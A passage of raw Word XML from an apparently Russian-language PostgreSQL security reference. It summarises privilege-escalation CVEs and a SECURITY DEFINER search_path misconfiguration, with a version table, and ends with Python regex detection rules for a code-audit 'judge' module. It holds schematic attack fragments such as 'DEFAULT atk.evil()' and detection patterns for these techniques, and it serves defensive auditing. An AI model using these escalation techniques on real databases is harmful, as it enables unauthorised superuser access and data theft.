        <w:t xml:space="preserve">privilege escalation в PostgreSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — от application-роли или PUBLIC до superuser или другой привилегированной роли. Пять из них якорятся на конкретные CVE (R8 / R12 / R15 / R16 / R28-chain), один (3.13.6) описывает классический mis-configuration без CVE. Главный тезис: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.13 — это не финальные RCE, а ступени</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Сами по себе векторы дают только право; финал — в категории 3.7 (COPY PROGRAM, untrusted PL), 3.6.4 (file r/w), 3.17 (RLS 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 SET ROLE / SET SESSION AUTHORIZATION (CVE-2024-10978)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — multi-tenant plan-cache leak. Утечка данных между tenant-ами, share-ящими одно соединение из pool. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Горизонтальная</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> эскалация: данные tenant_A видны при запросе tenant_B. Fix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3.13.2 search_path hijacking + schema_element (CVE-2023-2454)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SCHEMA ... CREATE TABLE ... DEFAULT atk.evil()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> обходит защитный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path = pg_catalog</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. RCE как admin, когда он выполняет такой DDL с user-controlled schema_element. Fix 11.05.2023.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3.13.3 Index expressions + autovacuum/REINDEX (CVE-2022-1552)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INDEX ... ((atk.evil(col)))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> исполняется под superuser при autovacuum-ANALYZE. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Пассивная атака</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — атакующий ждёт автоматического trigger. Fix 12.05.2022.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3.13.4 Extension scripts (CVE-2022-2625)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — pre-create функции с signature из extension install-script + последующий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от admin → ownership transfer с сохранением атакующего тела. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Deferred trigger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> при использовании extension-функции. Fix 11.08.2022.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3.13.5 Trusted extensions chains (R28)</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non-superuser-ом (PG 13+) → chain в CVE-2024-10979 (RCE через plperl) или R16-style (через pre-create). Самостоятельная атака от tenant-admin.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без SET search_path</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pg_temp.lower()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hijack любого unqualified-имени внутри SECURITY DEFINER функции. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Не CVE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, mis-configuration, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">актуальна во всех версиях PG</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Сводная таблица векторов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CVSS</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Затронуто</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Fix-версии (ветки)</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 ДО</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Финальная привилегия</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Связь</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17.0/16.4/15.8/14.13/13.16/12.20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17.1/16.5/15.9/14.14/13.17/12.21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на одну другую роль</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Чтение данных чужого tenant-а</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3.17.3 (RLS bypass)</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CVE-2023-2454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7.5 (High)</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15.2/14.7/13.10/12.14/11.19</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15.3/14.8/13.11/12.15/11.20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БД (для своей схемы)</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как admin (запускающий DDL)</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3.7.2a / 3.7.3</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CVE-2022-1552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14.2/13.6/12.10/11.15/10.20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14.3/13.7/12.11/11.16/10.21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схеме</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Arbitrary SQL под autovacuum (superuser)</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3.7.2a / 3.7.3</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CVE-2022-2625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14.4/13.7/12.11/11.16/10.21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14.5/13.8/12.12/11.17/10.22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FUNCTION в схеме (public до PG 15)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как admin при использовании extension-функции</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3.7.2a / 3.7.3</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3.13.5 chain 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 (chain)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17.0/16.4/15.8/14.13/13.16/12.20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17.1/16.5/15.9/14.14/13.17/12.21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БД (PG 13+)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без superuser</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3.13.5 chain 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CVE-2022-2625 (chain)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14.4/13.7/12.11/11.16/10.21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14.5/13.8/12.12/11.17/10.22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на БД (PG 13+)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Extension-function takeover</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3.13.4</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3.13.6</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(mis-configuration)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версии PG</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 (не CVE)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EXECUTE на SECURITY DEFINER функцию</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как owner функции (superuser)</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3.7.2a / 3.7.3</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">После фикс-версий всех CVE остаётся только 3.13.6 как актуальная угроза.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:spacing w:after="80" w:before="180"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py — готовое правило для класса PRIVILEGE_ESCALATION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Сводный набор паттернов:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="100" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"># app/schemas/sql.py — добавить в VulnerabilityClass enum:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">class VulnerabilityClass(str, Enum):</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PRIVILEGE_ESCALATION = "privilege_escalation"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DEFAULT_RISK_BY_CLASS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">VulnerabilityClass.PRIVILEGE_ESCALATION: 9,</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 _RE:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">"privesc_set_role_app": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SET ROLE в application-коде с конкатенацией (signal для 3.13.1 + 3.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:execute|fetch)\s*\(\s*[\"']SET\s+ROLE\s+[^\"']*\{",</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"privesc_schema_element": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # CREATE SCHEMA с schema_element, ссылающимся на user-defined функцию (3.13.2)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+SCHEMA\s+\w+\s+CREATE\s+(TABLE|VIEW)\b[^;]*DEFAULT\s+\w+\.\w+\s*\(",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE | re.DOTALL,</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"privesc_function_index": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # function-based index с функцией из чужой schema (3.13.3 — требует runtime owner-check)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+INDEX[^;]*\(\(\s*\w+\.\w+\s*\(",</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"privesc_extension_create_app": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # CREATE EXTENSION от application-роли (signal для 3.13.5)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?:execute|fetch)\s*\(\s*[\"']CREATE\s+EXTENSION\b",</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"privesc_secdef_no_searchpath": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # SECURITY DEFINER без SET search_path в declaration (3.13.6)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # требует multi-line matching на body CREATE FUNCTION</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+(OR\s+REPLACE\s+)?FUNCTION\b[^;]*SECURITY\s+DEFINER\b"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"(?![^;]*SET\s+search_path)",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    re.IGNORECASE | re.DOTALL,</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"privesc_pg_catalog_function": re.compile(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    # pre-create функции в pg_catalog (R16-indicator, 3.13.4)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    r"CREATE\s+(OR\s+REPLACE\s+)?FUNCTION\s+pg_catalog\.\w+",</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app/services/judge/rules.py — добавить ветку в rules_audit():</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">for key in (</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_set_role_app",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_schema_element",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_function_index",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_extension_create_app",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_secdef_no_searchpath",</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    "privesc_pg_catalog_function",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if _RE[key].search(sql_or_code):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        findings.append(VulnerabilityFinding(</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            vulnerability_class=VulnerabilityClass.PRIVILEGE_ESCALATION,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">            risk_score=9,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="F4F4F4" w:color="auto" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:line="240"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
